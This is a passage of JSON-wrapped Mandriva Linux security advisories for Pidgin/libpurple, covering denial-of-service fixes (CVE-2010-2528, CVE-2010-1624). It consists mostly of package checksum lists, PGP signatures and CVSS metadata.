a55cf9816776743e3defaff99d48d95e 2010.0/x86_64/pidgin-2.7.3-0.1mdv2010.0.x86_64.rpm\r\n 3e3297eff0fe50da1afb133fc1c6e92b 2010.0/x86_64/pidgin-bonjour-2.7.3-0.1mdv2010.0.x86_64.rpm\r\n 065c08529e685dc76b312c7084e74549 2010.0/x86_64/pidgin-client-2.7.3-0.1mdv2010.0.x86_64.rpm\r\n 3948da49ef61b00c01f614d9631c7268 2010.0/x86_64/pidgin-i18n-2.7.3-0.1mdv2010.0.x86_64.rpm\r\n a33bd79c0c77d48070ce251864a01867 2010.0/x86_64/pidgin-meanwhile-2.7.3-0.1mdv2010.0.x86_64.rpm\r\n 16891e8ef38a4e196d75658fda987cfb 2010.0/x86_64/pidgin-perl-2.7.3-0.1mdv2010.0.x86_64.rpm\r\n acd69903970f0fedc7fed460dce20f3d 2010.0/x86_64/pidgin-plugins-2.7.3-0.1mdv2010.0.x86_64.rpm\r\n 488a28dc35c30d692beed85f1958266e 2010.0/x86_64/pidgin-silc-2.7.3-0.1mdv2010.0.x86_64.rpm\r\n 329f3dbfe3c1270d69512fc35714f006 2010.0/x86_64/pidgin-tcl-2.7.3-0.1mdv2010.0.x86_64.rpm \r\n 68155307c48ba4c4d83f8337f299d5b0 2010.0/SRPMS/pidgin-2.7.3-0.1mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.1:\r\n 74579b9daf7829cf473571a5046d2683 2010.1/i586/finch-2.7.3-0.1mdv2010.1.i586.rpm\r\n 49ff1a21cedb2887d87fcc8c2c01903f 2010.1/i586/libfinch0-2.7.3-0.1mdv2010.1.i586.rpm\r\n 942900adb56a0c155e1c25afc80f04fb 2010.1/i586/libpurple0-2.7.3-0.1mdv2010.1.i586.rpm\r\n 0d74232f3f1f22548f88d675e38eaae3 2010.1/i586/libpurple-devel-2.7.3-0.1mdv2010.1.i586.rpm\r\n 0e5e69388f92f48ffcdd5ca6f0c4a05f 2010.1/i586/pidgin-2.7.3-0.1mdv2010.1.i586.rpm\r\n 8c420084dcee03e585723613c54a03c5 2010.1/i586/pidgin-bonjour-2.7.3-0.1mdv2010.1.i586.rpm\r\n 6d39b7f80cfc84316569a93b68e20ffe 2010.1/i586/pidgin-client-2.7.3-0.1mdv2010.1.i586.rpm\r\n ed4eecd54f2560d3037d0b738ba06140 2010.1/i586/pidgin-i18n-2.7.3-0.1mdv2010.1.i586.rpm\r\n 9309a8693cf0d00a5dbcc3037593388f 2010.1/i586/pidgin-meanwhile-2.7.3-0.1mdv2010.1.i586.rpm\r\n 54e73fbbe5170751735b2f09b63b1d9b 2010.1/i586/pidgin-perl-2.7.3-0.1mdv2010.1.i586.rpm\r\n ab16c9a8c76c7b4ad2aa4a63330aa555 2010.1/i586/pidgin-plugins-2.7.3-0.1mdv2010.1.i586.rpm\r\n 5462004ddf391342ac46960d3a5dc36e 2010.1/i586/pidgin-silc-2.7.3-0.1mdv2010.1.i586.rpm\r\n e7a46f75407c2063eefad440a9e47c5a 2010.1/i586/pidgin-tcl-2.7.3-0.1mdv2010.1.i586.rpm \r\n cc27820d6d975f3c6fe20aac044e2e2d 2010.1/SRPMS/pidgin-2.7.3-0.1mdv2010.1.src.rpm\r\n\r\n Mandriva Linux 2010.1/X86_64:\r\n f8ce165cae621ff31464867ef708689c 2010.1/x86_64/finch-2.7.3-0.1mdv2010.1.x86_64.rpm\r\n 038394859f480b54771c5fefe1548ada 2010.1/x86_64/lib64finch0-2.7.3-0.1mdv2010.1.x86_64.rpm\r\n 02de0ec7c1015454e305c964ddb1f3e8 2010.1/x86_64/lib64purple0-2.7.3-0.1mdv2010.1.x86_64.rpm\r\n 211875f94eb95d77a25f5472872ffb5e 2010.1/x86_64/lib64purple-devel-2.7.3-0.1mdv2010.1.x86_64.rpm\r\n d791f06b45f23499cf68aa0583474b11 2010.1/x86_64/pidgin-2.7.3-0.1mdv2010.1.x86_64.rpm\r\n 25089f1e1ec99d85ebb03208c7e253cf 2010.1/x86_64/pidgin-bonjour-2.7.3-0.1mdv2010.1.x86_64.rpm\r\n ec80ddd3ae86895e9ec2cc87765b7756 2010.1/x86_64/pidgin-client-2.7.3-0.1mdv2010.1.x86_64.rpm\r\n f99811c01f4875a2a556a7db55dfbe77 2010.1/x86_64/pidgin-i18n-2.7.3-0.1mdv2010.1.x86_64.rpm\r\n cc1d0b1c8006eff3e74e0731c35f5b12 2010.1/x86_64/pidgin-meanwhile-2.7.3-0.1mdv2010.1.x86_64.rpm\r\n bcdd432df8cf71099a423afb467cbc10 2010.1/x86_64/pidgin-perl-2.7.3-0.1mdv2010.1.x86_64.rpm\r\n 68ee77089e6ec4014107275d70927710 2010.1/x86_64/pidgin-plugins-2.7.3-0.1mdv2010.1.x86_64.rpm\r\n c3e39492df9753e1865363463cac0479 2010.1/x86_64/pidgin-silc-2.7.3-0.1mdv2010.1.x86_64.rpm\r\n 125602a2b6ee373f7a45ca8079b5ff2b 2010.1/x86_64/pidgin-tcl-2.7.3-0.1mdv2010.1.x86_64.rpm \r\n cc27820d6d975f3c6fe20aac044e2e2d 2010.1/SRPMS/pidgin-2.7.3-0.1mdv2010.1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFMY9opmqjQ0CJFipgRAnq3AKCNoeB1p0p38DiqexwLcQnK3ZksJwCaAhjV\r\nkcVYAorP1VH1YehF4uox/6g=\r\n=WyEv\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2010-08-14T00:00:00", "title": "[ MDVSA-2010:148 ] pidgin", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:36", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-2528"], "modified": "2010-08-14T00:00:00", "id": "SECURITYVULNS:DOC:24527", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24527", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:38", "references": ["https://vulners.com/securityvulns/securityvulns:doc:24527"], "description": "NULL pointer dereference on OSCAR protocol messages parsing &#40;ICQ, AIM&#41;", "edition": 1, "reporter": "BUGTRAQ", "published": "2010-08-14T00:00:00", "title": "libpurple library / Pidgin DoS", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:38", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "libpurple", "version": "2.7", "operator": "eq"}, {"name": "pidgin", "version": "2.7", "operator": "eq"}], "cvelist": ["CVE-2010-2528"], "modified": "2010-08-14T00:00:00", "id": "SECURITYVULNS:VULN:11074", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11074", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:34", "references": [], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2010:097\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : pidgin\r\n Date : May 18, 2010\r\n Affected: 2008.0, 2009.0, 2009.1, 2010.0, Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A security vulnerability has been identified and fixed in pidgin:\r\n \r\n The msn_emoticon_msg function in slp.c in the MSN protocol plugin in\r\n libpurple in Pidgin before 2.7.0 allows remote attackers to cause\r\n a denial of service &#40;application crash&#41; via a custom emoticon in a\r\n malformed SLP message &#40;CVE-2010-1624&#41;.\r\n \r\n Packages for 2008.0 and 2009.0 are provided due to the Extended\r\n Maintenance Program for those products.\r\n \r\n The updated packages have been patched to correct this issue.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1624\r\n http://pidgin.im/news/security/\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2008.0:\r\n 39da6e1befe7d01048d4a41b7f27c440 2008.0/i586/finch-2.6.6-0.2mdv2008.0.i586.rpm\r\n b6c7e668fad077f80cec0ca47ce311d5 2008.0/i586/libfinch0-2.6.6-0.2mdv2008.0.i586.rpm\r\n 8a783e00aa4e5d50f9cb09a626cc9802 2008.0/i586/libpurple0-2.6.6-0.2mdv2008.0.i586.rpm\r\n 563e945d4d8845d84a57b1f1ae88c37d 2008.0/i586/libpurple-devel-2.6.6-0.2mdv2008.0.i586.rpm\r\n ea3e4f5a11d1e32a5e7be40816eddb42 2008.0/i586/pidgin-2.6.6-0.2mdv2008.0.i586.rpm\r\n 93cdafbeef09bd1250e3800bf55da938 2008.0/i586/pidgin-bonjour-2.6.6-0.2mdv2008.0.i586.rpm\r\n 4e3c592f76f9615953c8bb90722f65ce 2008.0/i586/pidgin-client-2.6.6-0.2mdv2008.0.i586.rpm\r\n 722989e0f8f30bb4c6180b683d4f9d0c 2008.0/i586/pidgin-gevolution-2.6.6-0.2mdv2008.0.i586.rpm\r\n d906574b5763e213bef1c5069517438f 2008.0/i586/pidgin-i18n-2.6.6-0.2mdv2008.0.i586.rpm\r\n 79585f5fd8ec94a8d05bc8d5fec33ca9 2008.0/i586/pidgin-meanwhile-2.6.6-0.2mdv2008.0.i586.rpm\r\n 1d6265892c10934420f5d63aeb9cba72 2008.0/i586/pidgin-mono-2.6.6-0.2mdv2008.0.i586.rpm\r\n 65bfbd1361468a9ededb8e581700ff75 2008.0/i586/pidgin-perl-2.6.6-0.2mdv2008.0.i586.rpm\r\n 52a8a34a8e36a54d550d81d23dc45114 2008.0/i586/pidgin-plugins-2.6.6-0.2mdv2008.0.i586.rpm\r\n 7ebdb3fed50c7c6d5782a69647f0b02b 2008.0/i586/pidgin-silc-2.6.6-0.2mdv2008.0.i586.rpm\r\n fb57b2df3fad7851c27f7d45ba8cd55b 2008.0/i586/pidgin-tcl-2.6.6-0.2mdv2008.0.i586.rpm \r\n c2602fe995f1d6797ee917b57aefd69b 2008.0/SRPMS/pidgin-2.6.6-0.2mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2008.0/X86_64:\r\n a9f901de732b5288e43b2f8dbd5bd4a3 2008.0/x86_64/finch-2.6.6-0.2mdv2008.0.x86_64.rpm\r\n 3ac2a66e23f84dfcc31345afbc7ec0bc 2008.0/x86_64/lib64finch0-2.6.6-0.2mdv2008.0.x86_64.rpm\r\n 6905aabab0259c448902d1e0516ccd74 2008.0/x86_64/lib64purple0-2.6.6-0.2mdv2008.0.x86_64.rpm\r\n b3fcd66ccd6288f97eddc42ee4937f6a 2008.0/x86_64/lib64purple-devel-2.6.6-0.2mdv2008.0.x86_64.rpm\r\n 9c792a4f0be8a6c002cf5c3bb9f22a68 2008.0/x86_64/pidgin-2.6.6-0.2mdv2008.0.x86_64.rpm\r\n 18d29dc4cb350468c48de1d2c5aa56c3 2008.0/x86_64/pidgin-bonjour-2.6.6-0.2mdv2008.0.x86_64.rpm\r\n 65c45e3385cf29750e3492377cce88e3 2008.0/x86_64/pidgin-client-2.6.6-0.2mdv2008.0.x86_64.rpm\r\n 42e3de8866e0284fbcee2ff62836f042 2008.0/x86_64/pidgin-gevolution-2.6.6-0.2mdv2008.0.x86_64.rpm\r\n bf01b1f49e99dc787ec560660659b0e9 2008.0/x86_64/pidgin-i18n-2.6.6-0.2mdv2008.0.x86_64.rpm\r\n e7b47d0b0457df6a0551da682a61509b 2008.0/x86_64/pidgin-meanwhile-2.6.6-0.2mdv2008.0.x86_64.rpm\r\n 583fa3d32fe5b588216f64df2eb894f4 2008.0/x86_64/pidgin-mono-2.6.6-0.2mdv2008.0.x86_64.rpm\r\n e683cd89cbba18430856d13672452590 2008.0/x86_64/pidgin-perl-2.6.6-0.2mdv2008.0.x86_64.rpm\r\n e3b118db7dbe101be99cf51d7f1bffd5 2008.0/x86_64/pidgin-plugins-2.6.6-0.2mdv2008.0.x86_64.rpm\r\n 3ff404b2fd6e4bffa60f888bbf926fe7 2008.0/x86_64/pidgin-silc-2.6.6-0.2mdv2008.0.x86_64.rpm\r\n 6927b061d6a8cd9ca8f5e68fa3abd0f0 2008.0/x86_64/pidgin-tcl-2.6.6-0.2mdv2008.0.x86_64.rpm \r\n c2602fe995f1d6797ee917b57aefd69b 2008.0/SRPMS/pidgin-2.6.6-0.2mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2009.0:\r\n dca4890c223b4a899bc60d07cd2f3b1f 2009.0/i586/finch-2.6.6-0.2mdv2009.0.i586.rpm\r\n 5993799e4d4c5ecf28e9fb680bc5e18b 2009.0/i586/libfinch0-2.6.6-0.2mdv2009.0.i586.rpm\r\n a998aaae71d38ca12b1a3d235a746303 2009.0/i586/libpurple0-2.6.6-0.2mdv2009.0.i586.rpm\r\n 41c017b3427fda181db7103dfcb898f5 2009.0/i586/libpurple-devel-2.6.6-0.2mdv2009.0.i586.rpm\r\n 82340e116bab6b46efdf6a7df8d00029 2009.0/i586/pidgin-2.6.6-0.2mdv2009.0.i586.rpm\r\n 62c4fc091fdb34fbcb40841504886066 2009.0/i586/pidgin-bonjour-2.6.6-0.2mdv2009.0.i586.rpm\r\n e7c2a35984511c610b3f17b0fcc0e7bd 2009.0/i586/pidgin-client-2.6.6-0.2mdv2009.0.i586.rpm\r\n 68380c1123241738749f25ab5c39f29c 2009.0/i586/pidgin-gevolution-2.6.6-0.2mdv2009.0.i586.rpm\r\n 3fce1f659f909751524b729e9c216503 2009.0/i586/pidgin-i18n-2.6.6-0.2mdv2009.0.i586.rpm\r\n 6397617b6226701144842069e0b9501d 2009.0/i586/pidgin-meanwhile-2.6.6-0.2mdv2009.0.i586.rpm\r\n a927da190e6b89c509e09d6b1bb1115e 2009.0/i586/pidgin-mono-2.6.6-0.2mdv2009.0.i586.rpm\r\n e288757cfa928a821e8d5944ede971a2 2009.0/i586/pidgin-perl-2.6.6-0.2mdv2009.0.i586.rpm\r\n 7df24771d59a928fb7c16ba47b4d103b 2009.0/i586/pidgin-plugins-2.6.6-0.2mdv2009.0.i586.rpm\r\n 7ae970b3222e6d6aa9b01c4ec7607b35 2009.0/i586/pidgin-silc-2.6.6-0.2mdv2009.0.i586.rpm\r\n bc21c776a48d4b63ebaec43cf594042b 2009.0/i586/pidgin-tcl-2.6.6-0.2mdv2009.0.i586.rpm \r\n c4298c8612d9d1d25a6e28f4fb967e5c 2009.0/SRPMS/pidgin-2.6.6-0.2mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n d4ad2b665d726bfa0874db17bbc8a6e9 2009.0/x86_64/finch-2.6.6-0.2mdv2009.0.x86_64.rpm\r\n 027b2e374fea50109b856b1eca09d211 2009.0/x86_64/lib64finch0-2.6.6-0.2mdv2009.0.x86_64.rpm\r\n 7f86f1ab8e26fbb4904d975bb42305e0 2009.0/x86_64/lib64purple0-2.6.6-0.2mdv2009.0.x86_64.rpm\r\n 0814228db5a354dba43b85c5bbe76669 2009.0/x86_64/lib64purple-devel-2.6.6-0.2mdv2009.0.x86_64.rpm\r\n 90be3db323046d707706925e57cf3d9b 2009.0/x86_64/pidgin-2.6.6-0.2mdv2009.0.x86_64.rpm\r\n 861141dc25005772647d6dabaae80871 2009.0/x86_64/pidgin-bonjour-2.6.6-0.2mdv2009.0.x86_64.rpm\r\n 07ddb74d337b844d5ad1c83347c22b26 2009.0/x86_64/pidgin-client-2.6.6-0.2mdv2009.0.x86_64.rpm\r\n e7396ba80dec77e5592a3b28b857ccec 2009.0/x86_64/pidgin-gevolution-2.6.6-0.2mdv2009.0.x86_64.rpm\r\n 8fa26f766870280242f98341fe82b14b 2009.0/x86_64/pidgin-i18n-2.6.6-0.2mdv2009.0.x86_64.rpm\r\n 38b1706f19cfca603f7312ab9cf5eeed 2009.0/x86_64/pidgin-meanwhile-2.6.6-0.2mdv2009.0.x86_64.rpm\r\n 180468a8a07a8c2596c2e520b04374f6 2009.0/x86_64/pidgin-mono-2.6.6-0.2mdv2009.0.x86_64.rpm\r\n f163714ff2ae70786ce72936aefff6e9 2009.0/x86_64/pidgin-perl-2.6.6-0.2mdv2009.0.x86_64.rpm\r\n c91b167a11a619de015cf38a575ab099 2009.0/x86_64/pidgin-plugins-2.6.6-0.2mdv2009.0.x86_64.rpm\r\n f194c4f72caa60a6ff42847838b04347 2009.0/x86_64/pidgin-silc-2.6.6-0.2mdv2009.0.x86_64.rpm\r\n 6bdc684de45ecec534b0641d29b31a89 2009.0/x86_64/pidgin-tcl-2.6.6-0.2mdv2009.0.x86_64.rpm \r\n c4298c8612d9d1d25a6e28f4fb967e5c 2009.0/SRPMS/pidgin-2.6.6-0.2mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.1:\r\n 8b44a686e7efbd656a321b964da188a3 2009.1/i586/finch-2.6.6-0.2mdv2009.1.i586.rpm\r\n a159afab9de56b7ba9298f8b09cc3b05 2009.1/i586/libfinch0-2.6.6-0.2mdv2009.1.i586.rpm\r\n dc5122b41aa80525d3518f69005efff2 2009.1/i586/libpurple0-2.6.6-0.2mdv2009.1.i586.rpm\r\n 62f1513dad71c25075d481c9ab0e6bca 2009.1/i586/libpurple-devel-2.6.6-0.2mdv2009.1.i586.rpm\r\n 95e442ae9975cc451aaf7d46b459ab66 2009.1/i586/pidgin-2.6.6-0.2mdv2009.1.i586.rpm\r\n b20a50a109468d98969a1709c7c1508d 2009.1/i586/pidgin-bonjour-2.6.6-0.2mdv2009.1.i586.rpm\r\n 5a47dc6038140aae09362015da925231 2009.1/i586/pidgin-client-2.6.6-0.2mdv2009.1.i586.rpm\r\n 6306c8b1cadf27aee63c50dbe43aa860 2009.1/i586/pidgin-gevolution-2.6.6-0.2mdv2009.1.i586.rpm\r\n 7e7470494ca40330f660948534607351 2009.1/i586/pidgin-i18n-2.6.6-0.2mdv2009.1.i586.rpm\r\n 011f21c384b5950b8b4adaa6934d0574 2009.1/i586/pidgin-meanwhile-2.6.6-0.2mdv2009.1.i586.rpm\r\n e79dd93c671378f79b96c3026a5e5b20 2009.1/i586/pidgin-mono-2.6.6-0.2mdv2009.1.i586.rpm\r\n b5f989d29078cdcf81005087230d8853 2009.1/i586/pidgin-perl-2.6.6-0.2mdv2009.1.i586.rpm\r\n b941197c6673b4401e47e4ac11f31819 2009.1/i586/pidgin-plugins-2.6.6-0.2mdv2009.1.i586.rpm\r\n 0baa84bba47d7fbaa40757c8164a3325 2009.1/i586/pidgin-silc-2.6.6-0.2mdv2009.1.i586.rpm\r\n e4ec8998516594d7483b3a8489f361e2 2009.1/i586/pidgin-tcl-2.6.6-0.2mdv2009.1.i586.rpm \r\n ec938fb1d32bfbd319a440dd50d4756d 2009.1/SRPMS/pidgin-2.6.6-0.2mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n e96180d401fbded7374386085382b5dd 2009.1/x86_64/finch-2.6.6-0.2mdv2009.1.x86_64.rpm\r\n 07bcacd71517b085a1938a734197b1d5 2009.1/x86_64/lib64finch0-2.6.6-0.2mdv2009.1.x86_64.rpm\r\n 585d582a296fcd5c30ec7387c3a46758 2009.1/x86_64/lib64purple0-2.6.6-0.2mdv2009.1.x86_64.rpm\r\n 913a6a18a5f5c6b4858eec4a496cc7fa 2009.1/x86_64/lib64purple-devel-2.6.6-0.2mdv2009.1.x86_64.rpm\r\n 644d903c67cfce65c5fe977b3f7e07cf 2009.1/x86_64/pidgin-2.6.6-0.2mdv2009.1.x86_64.rpm\r\n d650c59e24cc5de92acb0854ee0d4464 2009.1/x86_64/pidgin-bonjour-2.6.6-0.2mdv2009.1.x86_64.rpm\r\n a67534c66f3a2998ae743db3232a64fa 2009.1/x86_64/pidgin-client-2.6.6-0.2mdv2009.1.x86_64.rpm\r\n 481b7c8c27c037bbbf2c9b4e6c7aa800 2009.1/x86_64/pidgin-gevolution-2.6.6-0.2mdv2009.1.x86_64.rpm\r\n b43bca4d99d534e16ba77f49c61119b8 2009.1/x86_64/pidgin-i18n-2.6.6-0.2mdv2009.1.x86_64.rpm\r\n cc9bb6142cdec058d8d3619a47ad3e9e 2009.1/x86_64/pidgin-meanwhile-2.6.6-0.2mdv2009.1.x86_64.rpm\r\n 8811e39b1e585bce7b98afae051db5fa 2009.1/x86_64/pidgin-mono-2.6.6-0.2mdv2009.1.x86_64.rpm\r\n 21572f6dc1a6cdd763fcde79e116030a 2009.1/x86_64/pidgin-perl-2.6.6-0.2mdv2009.1.x86_64.rpm\r\n 2378c598ebefd5c716467e67fee55916 2009.1/x86_64/pidgin-plugins-2.6.6-0.2mdv2009.1.x86_64.rpm\r\n 7d58ced43544f18390ac722e5894722f 2009.1/x86_64/pidgin-silc-2.6.6-0.2mdv2009.1.x86_64.rpm\r\n a85b2dcfd5598b8314f2c40546c45b7e 2009.1/x86_64/pidgin-tcl-2.6.6-0.2mdv2009.1.x86_64.rpm \r\n ec938fb1d32bfbd319a440dd50d4756d 2009.1/SRPMS/pidgin-2.6.6-0.2mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2010.0:\r\n 33a0a84e7eba1bd47f86fb739d6c5ebd 2010.0/i586/finch-2.6.6-0.2mdv2010.0.i586.rpm\r\n 0931dc9de8fc7a1e44e479ca20c74e61 2010.0/i586/libfinch0-2.6.6-0.2mdv2010.0.i586.rpm\r\n ac6633dc1c5eb3b33f171049c1e634eb 2010.0/i586/libpurple0-2.6.6-0.2mdv2010.0.i586.rpm\r\n f26673531049ba0d9e169208cbb87a83 2010.0/i586/libpurple-devel-2.6.6-0.2mdv2010.0.i586.rpm\r\n 84f4e6adc15b240bd27ab6a4a26a2b78 2010.0/i586/pidgin-2.6.6-0.2mdv2010.0.i586.rpm\r\n 40e984a3e8b9f48c1d5733dba820099f 2010.0/i586/pidgin-bonjour-2.6.6-0.2mdv2010.0.i586.rpm\r\n 33d16e91176165f9dd938907766fed67 2010.0/i586/pidgin-client-2.6.6-0.2mdv2010.0.i586.rpm\r\n 5e68628aa0eb64e78c3c212f7ccf930a 2010.0/i586/pidgin-gevolution-2.6.6-0.2mdv2010.0.i586.rpm\r\n 212b95dc896a5bc08688bb0c51de465a 2010.0/i586/pidgin-i18n-2.6.6-0.2mdv2010.0.i586.rpm\r\n a2c2a938d89d87066c96cf458b81ec66 2010.0/i586/pidgin-meanwhile-2.6.6-0.2mdv2010.0.i586.rpm\r\n 5fa945563aa7692fbc12d6823fd6be85 2010.0/i586/pidgin-mono-2.6.6-0.2mdv2010.0.i586.rpm\r\n 87ecb6d485340ca1c7c7a97a50be6dee 2010.0/i586/pidgin-perl-2.6.6-0.2mdv2010.0.i586.rpm\r\n 9626b616190a6b09612f26994ede0b5f 2010.0/i586/pidgin-plugins-2.6.6-0.2mdv2010.0.i586.rpm\r\n de41b0f2fef00e6af23ba88b6308d4de 2010.0/i586/pidgin-silc-2.6.6-0.2mdv2010.0.i586.rpm\r\n a95301834d173f6410bc3682f434de94 2010.0/i586/pidgin-tcl-2.6.6-0.2mdv2010.0.i586.rpm \r\n 9a4aaa0d7ac147e37df51ae67b9d402a 2010.0/SRPMS/pidgin-2.6.6-0.2mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n 807bd5068fbc7ab1ef2827c5d801749d 2010.0/x86_64/finch-2.6.6-0.2mdv2010.0.x86_64.rpm\r\n 54235086d9bf1f42e2576b424d23cc35 2010.0/x86_64/lib64finch0-2.6.6-0.2mdv2010.0.x86_64.rpm\r\n b03b8efaa05c69ba8a67bbd961131a36 2010.0/x86_64/lib64purple0-2.6.6-0.2mdv2010.0.x86_64.rpm\r\n 18ccf44235a82eea37e80e2ca731ab70 2010.0/x86_64/lib64purple-devel-2.6.6-0.2mdv2010.0.x86_64.rpm\r\n 0f7cf6239ddb04951fb4a8ab39e6f01d 2010.0/x86_64/pidgin-2.6.6-0.2mdv2010.0.x86_64.rpm\r\n 7b0116ab307c72dfffd73ad648d9fcac 2010.0/x86_64/pidgin-bonjour-2.6.6-0.2mdv2010.0.x86_64.rpm\r\n 256edf3796a2c7085cbf6f3f58a29560 2010.0/x86_64/pidgin-client-2.6.6-0.2mdv2010.0.x86_64.rpm\r\n 1621ef71ff976dd3cf8a669a42a44067 2010.0/x86_64/pidgin-gevolution-2.6.6-0.2mdv2010.0.x86_64.rpm\r\n 14ddd62b5d78e4cbb429926125486e24 2010.0/x86_64/pidgin-i18n-2.6.6-0.2mdv2010.0.x86_64.rpm\r\n f4b68c3333998aca9d29270d8d7fcdb4 2010.0/x86_64/pidgin-meanwhile-2.6.6-0.2mdv2010.0.x86_64.rpm\r\n 7f001bec8e12d37eaf968ea8024c5b14 2010.0/x86_64/pidgin-mono-2.6.6-0.2mdv2010.0.x86_64.rpm\r\n cba4f697fe9687e15c4f2f7bbfddf7a3 2010.0/x86_64/pidgin-perl-2.6.6-0.2mdv2010.0.x86_64.rpm\r\n 70f505ca311872675cab10c2edcf575a 2010.0/x86_64/pidgin-plugins-2.6.6-0.2mdv2010.0.x86_64.rpm\r\n e198ea841ab93f3afc6a12cd8feadbe4 2010.0/x86_64/pidgin-silc-2.6.6-0.2mdv2010.0.x86_64.rpm\r\n 10aa3695605c44ba245532d5abbc41ad 2010.0/x86_64/pidgin-tcl-2.6.6-0.2mdv2010.0.x86_64.rpm \r\n 9a4aaa0d7ac147e37df51ae67b9d402a 2010.0/SRPMS/pidgin-2.6.6-0.2mdv2010.0.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 13dda080ae598772a13ea683d079d015 mes5/i586/finch-2.6.6-0.2mdvmes5.1.i586.rpm\r\n bf2d3618907b7b6302eb59f348966e5d mes5/i586/libfinch0-2.6.6-0.2mdvmes5.1.i586.rpm\r\n af42d46fc20250d87d6cfde3b363eb33 mes5/i586/libpurple0-2.6.6-0.2mdvmes5.1.i586.rpm\r\n 24011318154b8b62cd35d9b4bd14a84b mes5/i586/libpurple-devel-2.6.6-0.2mdvmes5.1.i586.rpm\r\n bd6fec13ee349519e99930d337761208 mes5/i586/pidgin-2.6.6-0.2mdvmes5.1.i586.rpm\r\n 8172f83ada1201acb488258830ed6cfc mes5/i586/pidgin-bonjour-2.6.6-0.2mdvmes5.1.i586.rpm\r\n e73a9f04ba0727e30c90716827c5f5b1 mes5/i586/pidgin-client-2.6.6-0.2mdvmes5.1.i586.rpm\r\n 8d9c07fe4ab3931ab2040c5a0bf3293e mes5/i586/pidgin-gevolution-2.6.6-0.2mdvmes5.1.i586.rpm\r\n 37c80784ac3f42d9c6a8ae91c69c1eca mes5/i586/pidgin-i18n-2.6.6-0.2mdvmes5.1.i586.rpm\r\n 7ec1cd07032a001276777e49265d68cb mes5/i586/pidgin-meanwhile-2.6.6-0.2mdvmes5.1.i586.rpm\r\n c4f74368df8e12b41f65a8abc6961f38 mes5/i586/pidgin-mono-2.6.6-0.2mdvmes5.1.i586.rpm\r\n 72fdd07d1756aad281fa48b48417ec52 mes5/i586/pidgin-perl-2.6.6-0.2mdvmes5.1.i586.rpm\r\n 58974dc2cffc8361b7644b170feb16ca mes5/i586/pidgin-plugins-2.6.6-0.2mdvmes5.1.i586.rpm\r\n dc22560cf4c279a69e610ddb1dab4107 mes5/i586/pidgin-silc-2.6.6-0.2mdvmes5.1.i586.rpm\r\n e1f787fcc327bef63a070756c333eff8 mes5/i586/pidgin-tcl-2.6.6-0.2mdvmes5.1.i586.rpm \r\n 9bf03f46569aeaf34845efb22c2d9142 mes5/SRPMS/pidgin-2.6.6-0.2mdvmes5.1.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n fc9c1743282a44371606bcc6f8a140b3 mes5/x86_64/finch-2.6.6-0.2mdvmes5.1.x86_64.rpm\r\n 12b30fa1d0891dc6f99cb1cd38657624 mes5/x86_64/lib64finch0-2.6.6-0.2mdvmes5.1.x86_64.rpm\r\n bf848bc1b0f1de79901e2bac353239ef mes5/x86_64/lib64purple0-2.6.6-0.2mdvmes5.1.x86_64.rpm\r\n 007056059c45e53eb981df2ad0fce3d9 mes5/x86_64/lib64purple-devel-2.6.6-0.2mdvmes5.1.x86_64.rpm\r\n fd343d238369ff74f4106fabd2517bb7 mes5/x86_64/pidgin-2.6.6-0.2mdvmes5.1.x86_64.rpm\r\n 83e43c6edadaab559a53aaa9c182b022 mes5/x86_64/pidgin-bonjour-2.6.6-0.2mdvmes5.1.x86_64.rpm\r\n 0031769806e429d156a47fdd3a15bb4a mes5/x86_64/pidgin-client-2.6.6-0.2mdvmes5.1.x86_64.rpm\r\n d322e772b3687c9a26cbb3d1350cac7f mes5/x86_64/pidgin-gevolution-2.6.6-0.2mdvmes5.1.x86_64.rpm\r\n be5957fbd2183ba2500968993abdf257 